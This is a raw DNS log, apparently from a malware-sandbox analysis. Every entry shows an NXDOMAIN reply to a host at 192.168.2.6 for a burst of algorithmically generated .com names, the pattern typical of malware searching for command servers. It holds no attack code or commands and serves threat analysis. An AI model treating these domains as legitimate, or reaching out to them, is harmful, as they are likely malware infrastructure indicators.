Nov 11, 2024 18:14:00.218461037 CET	1.1.1.1	192.168.2.6	0xb5a8	Name error (3)	gadyrus.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.218653917 CET	1.1.1.1	192.168.2.6	0x1a0c	Name error (3)	puzyceg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.220813990 CET	1.1.1.1	192.168.2.6	0x6665	Name error (3)	qeqyhol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.222218990 CET	1.1.1.1	192.168.2.6	0x82b9	Name error (3)	lysywyd.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.223381996 CET	1.1.1.1	192.168.2.6	0x8019	Name error (3)	lyxysad.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.232839108 CET	1.1.1.1	192.168.2.6	0x2c4e	Name error (3)	volypof.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.239805937 CET	1.1.1.1	192.168.2.6	0x2a4b	Name error (3)	qekytig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.240217924 CET	1.1.1.1	192.168.2.6	0x8559	Name error (3)	gaqynih.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.401257992 CET	1.1.1.1	192.168.2.6	0xf983	Name error (3)	qexysev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.540098906 CET	1.1.1.1	192.168.2.6	0xcd39	Name error (3)	puvycel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.546772957 CET	1.1.1.1	192.168.2.6	0x6340	Name error (3)	vowyguf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.546901941 CET	1.1.1.1	192.168.2.6	0xe485	Name error (3)	lygywyj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.547077894 CET	1.1.1.1	192.168.2.6	0xcb17	Name error (3)	pufyweq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.547420025 CET	1.1.1.1	192.168.2.6	0x60df	Name error (3)	gaqyfub.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.548616886 CET	1.1.1.1	192.168.2.6	0x8669	Name error (3)	puzyxip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.549880028 CET	1.1.1.1	192.168.2.6	0xff21	Name error (3)	vopyguk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.552043915 CET	1.1.1.1	192.168.2.6	0x5d5a	Name error (3)	lykywex.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.554055929 CET	1.1.1.1	192.168.2.6	0x1176	Name error (3)	qekyryp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.554261923 CET	1.1.1.1	192.168.2.6	0x1aa7	Name error (3)	pupyguq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.560620070 CET	1.1.1.1	192.168.2.6	0xf9c4	Name error (3)	lyxyxox.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.561579943 CET	1.1.1.1	192.168.2.6	0x260d	Name error (3)	qedyhiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.568245888 CET	1.1.1.1	192.168.2.6	0x1bbf	Name error (3)	puzytul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.569298983 CET	1.1.1.1	192.168.2.6	0x9102	Name error (3)	qexyxop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.578412056 CET	1.1.1.1	192.168.2.6	0x958	Name error (3)	ganycob.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.579005957 CET	1.1.1.1	192.168.2.6	0x5e29	Name error (3)	galyryz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.581978083 CET	1.1.1.1	192.168.2.6	0x4316	Name error (3)	pumycav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.582446098 CET	1.1.1.1	192.168.2.6	0xaf0c	Name error (3)	vonycaf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.584387064 CET	1.1.1.1	192.168.2.6	0xb159	Name error (3)	lysygij.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.586076975 CET	1.1.1.1	192.168.2.6	0x7fad	Name error (3)	gahykeb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.592231035 CET	1.1.1.1	192.168.2.6	0x2004	Name error (3)	vojykyf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.592736959 CET	1.1.1.1	192.168.2.6	0xe4dc	Name error (3)	qebysaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.595134974 CET	1.1.1.1	192.168.2.6	0x184b	Name error (3)	pupymol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.595628023 CET	1.1.1.1	192.168.2.6	0x357c	Name error (3)	vonydem.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.597170115 CET	1.1.1.1	192.168.2.6	0x69f4	Name error (3)	gadyhoh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.597182989 CET	1.1.1.1	192.168.2.6	0x26a3	Name error (3)	volyrut.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.599422932 CET	1.1.1.1	192.168.2.6	0x323f	Name error (3)	lykylud.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.601656914 CET	1.1.1.1	192.168.2.6	0x3a34	Name error (3)	purybup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.620265961 CET	1.1.1.1	192.168.2.6	0xe709	Name error (3)	ganydeh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.636550903 CET	1.1.1.1	192.168.2.6	0xf07a	Name error (3)	qexytil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.636714935 CET	1.1.1.1	192.168.2.6	0x88aa	Name error (3)	qegykeg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.636730909 CET	1.1.1.1	192.168.2.6	0x1237	Name error (3)	pujylyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.637145042 CET	1.1.1.1	192.168.2.6	0xcff5	Name error (3)	lyrynux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.637737036 CET	1.1.1.1	192.168.2.6	0x6c7d	Name error (3)	puvypoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.638371944 CET	1.1.1.1	192.168.2.6	0xeef2	Name error (3)	lyvysaj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.641654015 CET	1.1.1.1	192.168.2.6	0x11c1	Name error (3)	vofyjom.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.643069983 CET	1.1.1.1	192.168.2.6	0xed94	Name error (3)	vowybyc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.643081903 CET	1.1.1.1	192.168.2.6	0x72b3	Name error (3)	gacycaz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.643209934 CET	1.1.1.1	192.168.2.6	0xf7ef	Name error (3)	lysymor.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.643405914 CET	1.1.1.1	192.168.2.6	0x5bc7	Name error (3)	lygyjan.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.643428087 CET	1.1.1.1	192.168.2.6	0xeb4	Name error (3)	gaqyvys.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.643440962 CET	1.1.1.1	192.168.2.6	0x679b	Name error (3)	qeqyvev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.644258022 CET	1.1.1.1	192.168.2.6	0x4866	Name error (3)	qedyqal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.644431114 CET	1.1.1.1	192.168.2.6	0xfde3	Name error (3)	pumydyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.644922972 CET	1.1.1.1	192.168.2.6	0x8e64	Name error (3)	lyxytur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.644964933 CET	1.1.1.1	192.168.2.6	0x20b2	Name error (3)	gatyniz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.645587921 CET	1.1.1.1	192.168.2.6	0xb3ca	Name error (3)	qetynup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.646339893 CET	1.1.1.1	192.168.2.6	0x8bb	Name error (3)	vocypok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.649609089 CET	1.1.1.1	192.168.2.6	0xa405	Name error (3)	gahyruh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.650280952 CET	1.1.1.1	192.168.2.6	0x6e19	Name error (3)	lyrygid.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.665348053 CET	1.1.1.1	192.168.2.6	0xabf4	Name error (3)	pufyjag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.665364981 CET	1.1.1.1	192.168.2.6	0xbc2b	Name error (3)	gacypiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.665375948 CET	1.1.1.1	192.168.2.6	0x46f2	Name error (3)	vopymit.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.665532112 CET	1.1.1.1	192.168.2.6	0xc0d6	Name error (3)	qegyryq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.666069984 CET	1.1.1.1	192.168.2.6	0x904e	Name error (3)	galyzus.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.666431904 CET	1.1.1.1	192.168.2.6	0x9c10	Name error (3)	qekyluv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.669719934 CET	1.1.1.1	192.168.2.6	0xa2d2	Name error (3)	vocycat.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.673799992 CET	1.1.1.1	192.168.2.6	0x5249	Name error (3)	purygiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.696722984 CET	1.1.1.1	192.168.2.6	0x274d	Name error (3)	gadyqaw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.702121973 CET	1.1.1.1	192.168.2.6	0x5210	Name error (3)	volyzic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.703988075 CET	1.1.1.1	192.168.2.6	0xb968	Name error (3)	vofyqek.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.704516888 CET	1.1.1.1	192.168.2.6	0x6d87	Name error (3)	qeqyfug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.720397949 CET	1.1.1.1	192.168.2.6	0x6dd4	Name error (3)	lymyfyn.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.799074888 CET	1.1.1.1	192.168.2.6	0x18c7	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.800930023 CET	1.1.1.1	192.168.2.6	0xe021	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.927270889 CET	1.1.1.1	192.168.2.6	0x44f	Name error (3)	volyqat.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.940826893 CET	1.1.1.1	192.168.2.6	0xee48	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:00.947240114 CET	1.1.1.1	192.168.2.6	0x267e	Name error (3)	qekyqop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.388360023 CET	1.1.1.1	192.168.2.6	0xf738	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.389508009 CET	1.1.1.1	192.168.2.6	0x358f	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.409917116 CET	1.1.1.1	192.168.2.6	0x4d3e	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.411253929 CET	1.1.1.1	192.168.2.6	0x7ca3	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.412233114 CET	1.1.1.1	192.168.2.6	0x4380	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.412761927 CET	1.1.1.1	192.168.2.6	0x9183	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.456971884 CET	1.1.1.1	192.168.2.6	0xf905	Name error (3)	galyqoh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.458178997 CET	1.1.1.1	192.168.2.6	0x9383	Name error (3)	purycaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.460014105 CET	1.1.1.1	192.168.2.6	0x14cf	Name error (3)	gacyryb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.460880995 CET	1.1.1.1	192.168.2.6	0xad1c	Name error (3)	vocyryf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.675733089 CET	1.1.1.1	192.168.2.6	0x608a	Name error (3)	lygygux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.814480066 CET	1.1.1.1	192.168.2.6	0x243f	Name error (3)	qexyreg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.818540096 CET	1.1.1.1	192.168.2.6	0xf645	Name error (3)	vowycok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.820705891 CET	1.1.1.1	192.168.2.6	0x42e7	Name error (3)	pufygup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.822150946 CET	1.1.1.1	192.168.2.6	0x7dc2	Name error (3)	lyxywen.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.822488070 CET	1.1.1.1	192.168.2.6	0x2e1a	Name error (3)	vofyguc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.824016094 CET	1.1.1.1	192.168.2.6	0x549b	Name error (3)	pumyxul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.827260017 CET	1.1.1.1	192.168.2.6	0x1257	Name error (3)	lysyfed.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.828432083 CET	1.1.1.1	192.168.2.6	0x237f	Name error (3)	gadyfys.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.832281113 CET	1.1.1.1	192.168.2.6	0xaae4	Name error (3)	qeqyxil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.834765911 CET	1.1.1.1	192.168.2.6	0xdcfa	Name error (3)	puzywag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.846474886 CET	1.1.1.1	192.168.2.6	0x5106	Name error (3)	gaqycow.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.847373962 CET	1.1.1.1	192.168.2.6	0xcd29	Name error (3)	qedyfyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.847387075 CET	1.1.1.1	192.168.2.6	0x99e2	Name error (3)	lymyxir.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.923877001 CET	1.1.1.1	192.168.2.6	0x90d7	Name error (3)	qekykal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.940433979 CET	1.1.1.1	192.168.2.6	0x735c	Name error (3)	pupybyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.962481976 CET	1.1.1.1	192.168.2.6	0xa36d	Name error (3)	gatyfuw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.968338966 CET	1.1.1.1	192.168.2.6	0x3ed0	Name error (3)	lyvyxin.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.012876034 CET	1.1.1.1	192.168.2.6	0x225	Name error (3)	pujywep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.014209986 CET	1.1.1.1	192.168.2.6	0x9d3b	Name error (3)	galykew.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.014709949 CET	1.1.1.1	192.168.2.6	0xdf59	Name error (3)	lysynun.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.017158031 CET	1.1.1.1	192.168.2.6	0x85b2	Name error (3)	lyvytud.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.020744085 CET	1.1.1.1	192.168.2.6	0x22e3	Name error (3)	volyqam.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.020813942 CET	1.1.1.1	192.168.2.6	0xa64f	Name error (3)	puvytuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.021929979 CET	1.1.1.1	192.168.2.6	0xd3b2	Name error (3)	ganypis.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.022098064 CET	1.1.1.1	192.168.2.6	0x1fc1	Name error (3)	lyryvaj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.022934914 CET	1.1.1.1	192.168.2.6	0x1cc2	Name error (3)	lyryfyr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.023665905 CET	1.1.1.1	192.168.2.6	0x63f9	Name error (3)	volykek.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.023864031 CET	1.1.1.1	192.168.2.6	0xf432	Name error (3)	pujyjol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.024270058 CET	1.1.1.1	192.168.2.6	0x3585	Name error (3)	vojyjot.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.024589062 CET	1.1.1.1	192.168.2.6	0xcd09	Name error (3)	gatyveh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.025404930 CET	1.1.1.1	192.168.2.6	0x3f0d	Name error (3)	gadynub.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.036211967 CET	1.1.1.1	192.168.2.6	0xfa40	Name error (3)	vonypic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.042006016 CET	1.1.1.1	192.168.2.6	0x7c23	Name error (3)	qetyveq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.042639017 CET	1.1.1.1	192.168.2.6	0x2fd7	Name error (3)	qebytuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.043493986 CET	1.1.1.1	192.168.2.6	0xbb14	Name error (3)	lykyjar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.045104027 CET	1.1.1.1	192.168.2.6	0x763e	Name error (3)	vocyzum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.045239925 CET	1.1.1.1	192.168.2.6	0x8995	Name error (3)	vopybym.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.046154976 CET	1.1.1.1	192.168.2.6	0xab5b	Name error (3)	qetyfyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.082644939 CET	1.1.1.1	192.168.2.6	0x3e45	Name error (3)	qedynug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.100579977 CET	1.1.1.1	192.168.2.6	0xf919	Name error (3)	gacyzuh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.100981951 CET	1.1.1.1	192.168.2.6	0x9409	Name error (3)	qegyhip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.101484060 CET	1.1.1.1	192.168.2.6	0x1e29	Name error (3)	vowydet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.101950884 CET	1.1.1.1	192.168.2.6	0xce27	Name error (3)	pumypop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.102128983 CET	1.1.1.1	192.168.2.6	0x85e0	Name error (3)	qeqysap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.102200985 CET	1.1.1.1	192.168.2.6	0xbcf3	Name error (3)	lyxylyj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.102893114 CET	1.1.1.1	192.168.2.6	0x9469	Name error (3)	qegyqov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.102905035 CET	1.1.1.1	192.168.2.6	0x1487	Name error (3)	pufymiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.103434086 CET	1.1.1.1	192.168.2.6	0xffe8	Name error (3)	purydel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.104222059 CET	1.1.1.1	192.168.2.6	0xfbf8	Name error (3)	qexyluq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.104245901 CET	1.1.1.1	192.168.2.6	0x4245	Name error (3)	gaqydaz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.104257107 CET	1.1.1.1	192.168.2.6	0x9130	Name error (3)	vofymif.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.108189106 CET	1.1.1.1	192.168.2.6	0xa9a3	Name error (3)	puvyxig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.110074043 CET	1.1.1.1	192.168.2.6	0xe9a5	Name error (3)	gahyqas.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.121434927 CET	1.1.1.1	192.168.2.6	0x34cf	Name error (3)	lymysox.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.123353004 CET	1.1.1.1	192.168.2.6	0xec0a	Name error (3)	qebyxog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.123691082 CET	1.1.1.1	192.168.2.6	0xc76	Name error (3)	vojyqac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.127336979 CET	1.1.1.1	192.168.2.6	0xcb68	Name error (3)	lygymod.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.881268978 CET	1.1.1.1	192.168.2.6	0xda1	Name error (3)	ganyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.883508921 CET	1.1.1.1	192.168.2.6	0x1ca9	Name error (3)	gatydab.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.883991003 CET	1.1.1.1	192.168.2.6	0xfbfa	Name error (3)	lyvylyx.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.886944056 CET	1.1.1.1	192.168.2.6	0x5b68	Name error (3)	qekyqoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.888250113 CET	1.1.1.1	192.168.2.6	0xec3b	Name error (3)	pufybyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.888264894 CET	1.1.1.1	192.168.2.6	0xfe6e	Name error (3)	lykymij.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.888277054 CET	1.1.1.1	192.168.2.6	0x1a39	Name error (3)	vopydaf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.892326117 CET	1.1.1.1	192.168.2.6	0x5aa6	Name error (3)	vofydak.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.892868042 CET	1.1.1.1	192.168.2.6	0xe7af	Name error (3)	qetysog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.893043041 CET	1.1.1.1	192.168.2.6	0x1314	Name error (3)	vojymuk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.893223047 CET	1.1.1.1	192.168.2.6	0xc0e2	Name error (3)	qebylyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.893959045 CET	1.1.1.1	192.168.2.6	0x8938	Name error (3)	lyxymix.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.894385099 CET	1.1.1.1	192.168.2.6	0xcdd8	Name error (3)	gaqyzyb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.897572994 CET	1.1.1.1	192.168.2.6	0xb732	Name error (3)	qexyqip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.899301052 CET	1.1.1.1	192.168.2.6	0xc5aa	Name error (3)	gahyfyh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.907804012 CET	1.1.1.1	192.168.2.6	0x7be2	Name error (3)	pupydev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.908601999 CET	1.1.1.1	192.168.2.6	0x4ed0	Name error (3)	vonyzut.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.909862995 CET	1.1.1.1	192.168.2.6	0x4429	Name error (3)	vowyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.910003901 CET	1.1.1.1	192.168.2.6	0x4642	Name error (3)	pujymiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.910348892 CET	1.1.1.1	192.168.2.6	0xe022	Name error (3)	gadydow.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.912514925 CET	1.1.1.1	192.168.2.6	0x3486	Name error (3)	pufydaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.912605047 CET	1.1.1.1	192.168.2.6	0x1d55	Name error (3)	puryxuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.913423061 CET	1.1.1.1	192.168.2.6	0xe3b0	Name error (3)	puzymup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.914768934 CET	1.1.1.1	192.168.2.6	0x1649	Name error (3)	lyryxud.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.915127039 CET	1.1.1.1	192.168.2.6	0x420e	Name error (3)	qeqylyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.926139116 CET	1.1.1.1	192.168.2.6	0x1c55	Name error (3)	vocyqot.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.930989027 CET	1.1.1.1	192.168.2.6	0xa7c3	Name error (3)	gacyqoz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.931464911 CET	1.1.1.1	192.168.2.6	0x77ae	Name error (3)	qegyfeq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.948694944 CET	1.1.1.1	192.168.2.6	0x9787	Name error (3)	lygyfej.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.984571934 CET	1.1.1.1	192.168.2.6	0x424	Name error (3)	pumytyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.985286951 CET	1.1.1.1	192.168.2.6	0xa6f4	Name error (3)	vocykec.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.985583067 CET	1.1.1.1	192.168.2.6	0xc2fc	Name error (3)	qegynul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.985759020 CET	1.1.1.1	192.168.2.6	0x3a58	Name error (3)	lyxyjod.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.985771894 CET	1.1.1.1	192.168.2.6	0x8958	Name error (3)	purypig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.986685038 CET	1.1.1.1	192.168.2.6	0xca0c	Name error (3)	qexykav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.986799002 CET	1.1.1.1	192.168.2.6	0x1f67	Name error (3)	lyryson.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.986814976 CET	1.1.1.1	192.168.2.6	0x8f72	Name error (3)	galyhib.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.987530947 CET	1.1.1.1	192.168.2.6	0x58b6	Name error (3)	qedyvap.com	none	none	A (IP address)	IN (0x0001)	false
